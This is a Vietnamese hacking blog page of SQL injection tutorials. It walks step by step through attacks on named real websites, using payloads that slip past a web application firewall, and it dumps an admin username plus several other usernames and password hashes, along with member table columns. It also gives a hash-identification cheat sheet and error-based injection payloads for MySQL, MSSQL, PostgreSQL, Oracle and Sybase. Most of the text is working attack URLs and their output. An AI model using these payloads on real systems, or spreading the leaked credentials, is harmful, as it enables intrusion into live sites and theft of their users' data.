Thứ Tư, 7 tháng 6, 2017

Hướng Dẫn Hack site lỗi SQL bị chặn xuất hiện “406 Not Acceptable “

Hướng Dẫn Hack site lỗi SQL bị chặn xuất hiện “406 Not Acceptable “

Hướng Dẫn Hack site lỗi SQL bị chặn xuất hiện “406 Not Acceptable “
Kiểm tra đường link bị lỗi bằng cách them dấu “ ‘ “ :
http://www.mp3hungama.com/music/genre_albums.php?id=1
Xuất hiện lỗi: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1
Bước 1: +) Check Số số trường cột: sử dụng: “order by …–“
http://www.mp3hungama.com/music/genre_albums.php?id=1 order by 10–
Site bị lỗi, tiếp tục thử:
+) http://www.mp3hungama.com/music/genre_albums.php?id=1 order by 3–
Site bình thường, tiếp tục:
+) http://www.mp3hungama.com/music/genre_albums.php?id=1 order by 4–
Ok, site bị lỗi, chứng tỏ số cột có trong database là: 4-1 =3
Chúng ta tiếp tục khai thác nhé!
Bước 2: Lấy thông tin về version, database, user:
Câu lệnh đúng cả mà xuất hiện lỗi:
406 Not Acceptable
This request is not acceptable
________________________________________
Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!

+) Với lỗi này, ta thay khoảng trắng space bằng: %0a
http://www.mp3hungama.com/music/genre_albums.php?id=1 union%0aselect 1,2,3–
Ok, trang đã vào được, nhưng sao không thấy số má gì cả nhỉ, thử thay số 1 bằng null xem
http://www.mp3hungama.com/music/genre_albums.php?id=null union%0aselect 1,2,3–
Cũng không được. Cách đó bỏ qua, bây giờ chúng ta chuyển sng cách khác:
http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0aconcat_ws(version(),database(),user())),floor(rand(0)*2))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)
hix, vẫn bị lỗi
406 Not Acceptable
This request is not acceptable
________________________________________
Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!
Để khăc phục lỗi này, ta thử chèn %0a giữa select và concat_ws xem,
http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0aconcat_ws(version(),database(),user())),floor(rand(0)*5))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)
Ok, đã xuất hiện thông tin ta muốn:
[Duplicate entry ‘hungama_music5.0.92-community-loghungama_fizi@localhost1’ for key 1
Version 5. , ngon roofy, không cần phải mò mẫn.
Bước 3: Exploit tên tables
+ Chèn đoạn mã sau:
http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0a/*!5000table_name*/ from information_schema.tables /*!5000where*/ table_schema=database() limit 0,1),floor(rand(0)*2))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)
Lưu ý: ta đặt /*!5000…..*/ mục đích để không bị chăn bởi mod security khi xuất hiện lỗi: “406 Not Acceptable “
Ta được table đầu tiên: ‘active_guests’
Duplicate entry ‘active_guests1’ for key 1
+) Để lấy các tables tiếp theo ta thay: limit 1,1 rồi limit 2,1…. Cho tới khi nào tới table mà mình cần lấy.
Limit 1,1 table là: active_users
Limit 2,1 table là: admin_review_mgt1…..
Và table tôi muốn khai thác là: limit 43,1: users
http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0a/*!5000table_name*/ from information_schema.tables /*!5000where*/ table_schema=database() limit 43,1),floor(rand(0)*2))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)
Duplicate entry ‘users1’ for key 1
Ok! Tiếp tục khai thác table “users”
Bước 4: Exploit tên columns
+) http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0a/*!5000column_name*/ from information_schema.columns /*!5000where*/ table_schema=database() and /*!5000table_name*/=0x7573657273 limit 0,1),floor(rand(0)*2))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)
Xuât hiện column đầu tiên là: “username”
Duplicate entry ‘username1’ for key 1
+) Tương tự như trên, limit 1,1
http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0a/*!5000column_name*/ from information_schema.columns /*!5000where*/ table_schema=database() and /*!5000table_name*/=0x7573657273 limit 1,1),floor(rand(0)*2))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)
Ta được column thứ 2: password
Duplicate entry ‘password1’ for key 1
Như thế là đủ rồi các bạn nhỉ,
Bước 5: Lấy thông tin admin:
+)http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0Aconcat(username,0x7c,password) from users limit 0,1),floor(rand(0)*2))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)
Kêt quả: Duplicate entry ‘admin|3d145b6d4827e1f25994a3da418419e41’ for key 1
Ta đã có tài khoản admin bao gồm: username/password: admin|3d145b6d4827e1f25994a3da418419e4
Lưu ý: từ đầu bài đến giờ ta không quan tâm con số 1 ở cuối, nên bây giờ password mã hóa ta cũng không cho số 1 ấy vào
+) Để lấy các tài khoản quản trị khác ta cứ việc lên “limit”
Với limit 1,1 ta được username/password:
obaid|15d4b4bb7b462baf16e04eadc399e4be
Với limit 2,1 ta được username/password:
geniusarien|2cbb8de1484e29bb4ad9865412c36f26
Với limit 3,1 ta được username/password:
junaidshaheen|a7899c013b27bd38e1e3a1905dfc1a65
Với limit 4,1 ta được username/password:
nicx|7eb865ffc81fb5eb3638ddbcfcb6a68c
Với limit 5,1 ta được username/password:
munib|f5a4324a48f0f18095e7de550b2407bb
Hix, tài nhiều tài khoản quá, các bạn muốn lấy tiếp thì làm tương tự nhé. Quan trong là có được admin bigsmile
Chúc Vui!

Hướng đi cơ bản cho HACKER

Hãy chắc chắn rằng các bạn đã sẵn sàng cho việc tự tìm hiểu, giờ hãy bắt đầu đi vào phần chính của “study case.
Trước mắt ta cần phải tìm hiểu về kĩ năng quản trị, cụ thể bao gồm:
1. Kĩ năng quản trị và sử dụng CSDL (MySQL, MSSQL …)
2. Một khả năng lập trình (yêu cầu đọc hiểu tư duy trong code và viết được script đơn giản)
3. Kiến thức về hệ điều hành (yêu cầu sử dụng thành thạo, biết xem log hệ thống và phân tích nguyên nhân lỗi từ log)
4. Kiến thức về mạng căn bản: giao thức là gì và sự khác nhau giữa các giao thức
5. Kiến thức về mã hóa, chứng thực và bảo mật: phân biệt được encode, encrypt và hash; session và cookies..
Về việc tìm hiểu một vấn đề, thay vì đi google, search hỏi linh tinh thì nếu có điều kiện, nên đi nhà sách tìm mua một cuốn sách phù hợp và ngâm cứu nó, không nên mua những cuốn nặng quá về học thuật vì nó khó tiếp cận đối với người chưa có kinh nghiệm.
Đơn cử VD với SQL, bạn nên chọn cuốn này:
http://www.vinabook.com/tu-hoc-sql-hay-danh-10-phut-moi-ngay-ban-se-thanh-cong-voi-sql-m11i12878.html
hoặc cũng có thể xem thêm các cuốn chuyên đề mỏng mỏng như báo (7 – 8k/cuốn)
http://www.vinabook.com/lam-quen-voi-sql-server-2000-m11i24190.html
Sự khác biệt về sách in, ebook và các bài viết trên mạng:
1. Sách là tài liệu đầy đủ nhất
2. Sách in có thể đọc ở mọi nơi, bạn có thể mang vào WC đọc để giết thời gian trong khi ebook có thể làm bạn đau mắt (J rất hiếm khi đọc ebook, chỉ mở ebook để tìm và đọc nhanh một đoạn cần đọc). J mỗi ngày làm việc với máy tính tầm 8 – 14 tiếng, mắt vẫn 10/10.
3. Các bài viết trên các blog, forum tuy không đầy đủ nhưng nó lại rất có ích vì hoặc là nó cung cấp cái nhìn tổng quát (tổng quan, dễ hiểu) hoặc cung cấp một khía cạnh đặc biệt (chuyên sâu, học thuật) mà sách có thể thiếu hoặc nói không chi tiết.
Các thể loại học nhanh, đơn giản như vậy tuy không làm bạn trở thành chuyên gia nhưng nó trang bị cho bạn một lượng kiến thức nền tảng, từ đó bạn có điều kiện tốt để tự nâng cấp mình.
Bắt đầu từ bài viết này, các bạn có thắc mắc có thể gởi lên đây, tuy nhiên những reply/comment nhằm chuyển hướng topic mình sẽ move vào sọt mà không cần báo trước
Chúc các bạn thành công !
Nguồn: enhack.net

Nhận dạng các loại mã hóa

Nhận dạng các loại mã hóa:

1.MySQL có 2 loại
60671c896665c3fa MySQL loại 16 kí tự
667f407de7c6ad07358fa38daed7828a72014b4e MySQL5 loại 40 kí tự
2.MD4 có 3 loại:
bde52cb31de33e46245e05fbdbd6fb24 MD4 loại này 32 kí tự
a0f0057303393f643a09d7db430b9fe1 MD4 (HMAC*) 32 kí tự
veUssx3jPkYkXgX729b7JA==Z7g= MD4 (Base64*) Loại này dạng base64 có 28 kí tự
3.MD5 có tới 5 dạng:
0cc175b9c0f1b6a831c399e269772661 MD5 32 kí tự
3673438f11d71c21a9b8b59232a3dd61 MD5 (HMAC) 32 dạng HMAC 32 kí tự
DMF1ucDxtqgxw5niaXcmYQ==Z7g= MD5 (Base64) 28 Kí tự
$1$$Ij31LCAysPM23KuPlm1wA/ MD5 (Unix) 26 kí tự
$apr1$$ny0TwGBt5/BPT4.mbWBKk. MD5 (APR) 29 kí tự.
4.MSCash
9bea8ee5c345f595cd9f9b37a1a2a887 MSCash 32 kí tự
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8
5.SHA-1 có 2 loại:
7f984109f39759f3f41dba04f5183741e36f1445 Sha-1 (HMAC) 40 kí tự
hvfkN/qlp/zhXR3cuerq6jd2Z7g= Sha-1 (Base64) 28 kí tự

Khai Thác Shop Lỗi Dạng HTML

Khai Thác Shop Lỗi Dạng HTML

Tut cũ nhưng post lại cho newbie nhé
Khai thác sql dạng HTML
victim là:
Thêm dấu ‘ vào sau những con số
http://www.worldwidehealthcenter.net…es-261%27.html
Lỗi nhé
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/whc/www/articles.php on line 16
Warning: Cannot modify header information – headers already sent by (output started at /home/whc/www/articles.php:16) in /home/whc/www/include.php on line 432
Bắt đầu order by
http://www.worldwidehealthcenter.net/articles-261 order by 8– -.html >> bao loi
>>8-1=7 nhé
bây h union select :
http://www.worldwide…et/articles-261 union select 1,2,3,4,5,6,7– -.html
ax không thấy số nào : view source , chẳng thấy gì hết
Các bạn thay số bằng null xem 261=null
http://www.worldwidehealthcenter.net/articles-null union select 1,2,3,4,5,6,7– -.html
ra rồi 2 và 3 nhé
Tìm các thông tin :version(),database(),user()
http://www.worldwidehealthcenter.net/articles-null union select 1,2,version(),4,5,6,7– -.html
Tiếp theo tìm table name
http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()– -.html
Ra 1 đống :
adprice,artcat,articles,banners,brands,bulktemp,ca tegories,clickthrus,concerns,countries,directory,d irectorybak,directorystats,discount,distributorord er,emailaddresses,exchange,iptoc,keywords,loyalty, member,memberbak,memberbak2,message,ocountries,ord eritems,orders,ordersbak,postal,practcat,products, productsbak,purchaseorders,retaildiscount,ship,shi pdiscount,shipping,states,static,subscribers,suppl iers
Tìm table chứa thông tin
Ở đây nhìu cái quá mình loạn, thôi mình tìm table member nhé
member=0x6d656d626572 (conver to hex nhé)
Bây giờ get column
http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=database() and table_name=0x6d656d626572– -.html
lại ra 1 đống :
id,password,email,title,firstname,surname,company, address,city,state,postal,shoppercountry,tel,fax,s ameshipadd,shiptitle,shipfirstname,shipsurname,shi pcompany,shipaddress,shipcity,shipstate,country,sh ippostal,shiptel,shipfax,advertise,dateemailed,typ e
Tới đây là được rồi, mọi cái còn lại đơn giản , ae làm nhé

Hướng dẫn khai thác SQL Injection đối với MySQL database

Hướng dẫn khai thác SQL Injection đối với MySQLdatabase

I. Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL 
Demo: Khai thác SQL Injection trong Basic PHP Events Lister 1.0 
Đầu tiên với URL: http://seamoun.com/phpevents/event.php?id=1 
Thực hiện thêm dấu  sau id=1. URL trở thành http://seamoun.com/phpevents/event.php?id=1 
Ta phát hiện rằng phpvents có lỗi SQL Injection với thông báo sau:
Code:
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in 
C:\xampp\htdocs\phpevents\event.php on line 37
Đối tượng khai thác SQL Injection ở đây là “Basic PHP Events Lister 1.0”. Giả sử chúng ta không biết trường và bảng của ứng dụng web này là gì?
Với lỗi SQL Injection gây ra bởi URL trên ta xem thử truy vấn (SQL) của nó liệu có bao nhiều trường. Sở dĩ cần xác định điều này
bởi vì khi chúng ta dùng UNION trong câu lệnh SQL thì số lượng trường của hai câu lệnh select phải trùng nhau.
(Các bạn không rõ vấn đề này thì xem ý nghĩa câu lệnh SQL. Ở đây mình không giải thích vì hiển nhiên phải hiểu rõ SQL mới khai thá được).
Xác định có bao nhiêu trường truy vấn với URL http://seamoun.com/phpevents/event.php?id=1 có rất nhiều cách để thực hiện. Ở đây mình sử dụng order by <num>. Thực hiện tăng dần <num>. Khi thực hiện order by <num>, nếu trang web không hiển thị lỗi tức là số lượng trường vẫn còn, thực hiện tăng <num> cho đến khi nào xuất hiện lỗi tức là ta đã thực hiện tìm đủ số lượng trường.
Lần lượt mình thử:
Code:
http://seamoun.com/phpevents/event.php?id=1 order by 1 
http://seamoun.com/phpevents/event.php?id=1 order by 2 
http://seamoun.com/phpevents/event.php?id=1 order by 3
...

 http://seamoun.com/phpevents/event.php?id=1 order by 15 (<-- Vẫn OK)
 http://seamoun.com/phpevents/event.php?id=1 order by 16 (Xuất hiện lỗi)
Như vậy truy vấn SQL với URL trên là 15 trường (field)
Đến đây có thể điều tra phiên bản SQL, user với lệnh sau
Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1, @@version,
1,1,1,1,1,1,1,1,1,1,1,1,1 

http://seamoun.com/phpevents/event.php?id=1 union all select 1, user(),
1,1,1,1,1,1,1,1,1,1,1,1,1
Sau khi đã có số lượng trường rồi thì lúc này sẽ tiến hành đoán bảng (table) login của nó: có thể thử với các table thông dụng như
manager, admin, administrator, systemlogin, … (Việc đoán table thuộc về kinh nghiệm, kết hợp với việc crawl, spider nội dung web mà mình khai thác). Nếu như tên bảng không đúng thì khi thực hiện union all select … nó sẽ thông báo lỗi, ngược lại nếu tên đúng thì nó chạy OK. Tiến hành thử tìm table như sau:
Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from systemlogin (Fail) 

http://seamoun.com/phpevents/event.php?id=1 union all select 
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from manager (Fail) 

http://seamoun.com/phpevents/event.php?id=1 union all select 
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)
Sau khi đoán được tên table là admin. Tiếp theo là dự đoán tên trường trong bảng admin mà mình đã lấy được.
Có thể đoán tên trường trong bảng admin như là username,uname,user, … pass, passwd, password, pword, …. (Tương tự như trên cũng tùy thuộc vào kinh nghiệm kết hợp với việc crawl, spider nội dung web để tìm tên trường). Tiền hành thử như sau
Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,username, 
1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail) 

http://seamoun.com/phpevents/event.php?id=1 union all select 1,user, 
1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail) 

http://seamoun.com/phpevents/event.php?id=1 union all select 1,uname, 
1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Như vậy trường thứ nhất ta đoán được là uname trong bảng admin. Thực hiện đoán trường mật khẩu

http://seamoun.com/phpevents/event.php?id=1 union all select 1,password, 
1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail) 

http://seamoun.com/phpevents/event.php?id=1 union all select 1,passwd, 
1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail) 

http://seamoun.com/phpevents/event.php?id=1 union all select 1,pword, 
1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)
Như vậy ta đoán được trường mật khẩu là pword. Như vậy ta đã có thông tin đầy đủ để lấy user và pass trong bảng admin với
2 trường uname và pword + tên bảng là admin
Thực hiện lệnh:
Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,
concat(uname,0x3a,pword), 1,1,1,1,1,1,1,1,1,1,1,1,1 from admin.
Thực chất với hai câu lệnh trên thì ta tìm được user và pass nhưng muốn thực hiện lệnh http://seamoun.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from admin. Để có được tất cả user và pass trong bảng admin. Nếu trường hợp này xuất hiện lỗi ta có thể thêm limit 0,1 và tăng dần limit 1,1 limit 2,1 để lấy hết tất cả user và pass
Sở dĩ thực hiện câu lệnh trên để đồng thời lấy uname và pword không cần phải thực hiện 2 lần mới có được uname và pword.
0x3a—> dấu “:”. Concat sẽ thực hiện cộng chuỗi
Đến đây ta đã có thông tin uname và pword.
Nếu trường hợp mà kết nối đến MySQL sử dụng user root thì việc tìm bảng và trường dễ dàng hơn với lệnh sau
Code:
Điều tra thông tin bảng:

 http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,table_name, 
1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables

Điều tra thông tin trường:

 http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,column_name, 
1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns
Ngoài ra trong một số trường hợp xuất hiện lỗi khi thực hiện khai thác có thể sử dụng hàm convert, hex, … để không bị lỗi khi khai thác như:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,unhex(hex(uname)),1,1,1,1,1,1,1,1,1,1,1,1 from admin
II. Demo: Khai thác SQL Injection trong Basic PHP Events Lister 1.0 (milw0rm.com) 
Đây chỉ là hướng dẫn cơ bản nhất về khai thác SQL – Injection đối với MySQL. Các bạn demo thì install trên máy mình để kiểm tra, đừng đi hack người khác à nha.

Khai thác lỗi Blind SQL

Khai thác lỗi Blind SQL


Phương pháp thực chất là phương pháp set khóa chính có cấu trúc và tên gọi giống nhau lặp lại 2 lần
VD:
tương tự như
Primarykey(‘id‘,’id‘)
Trong hệ quản trị CSDL ,ta không thể add 1 lúc 2 khóa chính giống nhau => Trùng
Và lúc này lợi dùng chức năng thông báo lỗi của các hệ quản trị CSDL để xuất ra thông tin ta cần tìm.
Các bạn có thể test ngay trên phpmyadmin ^_^ (MYSQL)
Code:
mysql> select 1,2 union select count(*),concat(version(),
floor(rand(0)*2))x from information_schema.tables group by x;
Sẽ trả về thông báo
ERROR 1062 (23000): Duplicate entry ‘5.0.841’ for key 1<= bi trùng khóa ‘5.0.841‘ ,đây là thông tin mà ta cần lấy.
Tương tự
Code:
mysql> select 1 and (select 1 from(select count(*),
concat(version(),floor(rand(0)*2))x information_schema.tables 
group by x)a);

ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1
Ví dụ:
Code:
http://server/?id=(1)and(select+1+from(select+count(*),
concat((select+table_name+from+information_schema.tables+
limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+
group+by+x)a)--
Với phương pháp này ta cũng áp dụng được trên MSSQL
qua phương pháp ‘convert(int,xyz);’
vd:
Code:
http://server/?id=(1)and(1)=(convert(int,(select+table_name+
from(select+row_number()+over+(order+by+table_name)+as+rownum,
table_name+from+information_schema.tables)+as+t+where+
t.rownum=1)))--
Đối với PostgreSQL thì hơi khác 1 chút.
vd:
Code:
http://server/?id=(1)and(1)=cast((select+table_name+from+
information_schema.tables+limit+1+offset+0)+as+numeric)--
Đối với Oracle
vd:
Code:
http://server/?id=(1)and(1)=(select+upper(xmltype(chr(60)||
chr(58)||chr(58)||(select+rawtohex(login||chr(58)||chr(58)
||password)from(select+login,password,rownum+
rnum+from+users+a)where+rnum=1)||chr(62)))from dual)--
Tổng kết lại ta có các phương thức ^_^.
PostgreSQL:
Code:
 /?param=1 and(1)=cast(version() as numeric)--
MSSQL:
Code:
 /?param=1 and(1)=convert(int,@@version)--
Sybase:
Code:
/?param=1 and(1)=convert(int,@@version)--
MySQL>=4.1<5.0:
Code:
/?param=(1)and(select 1 from(select count(*),
concat(version(),floor(rand(0)*2))x 
from TABLE_NAME group by x)a)--
Hoặc
Code:
/?param=1 and row(1,1)>(select count(*),
concat(version(),0x3a,floor(rand()*2))x 
from (select 1 union select 2)a group by x
 limit 1)--
MySQL>=5.0:
Code:
 /?param=(1)and(select 1 from(select count(*),
concat(version(),floor(rand(0)*2))x 
from information_schema.tables group by x)a)--

ST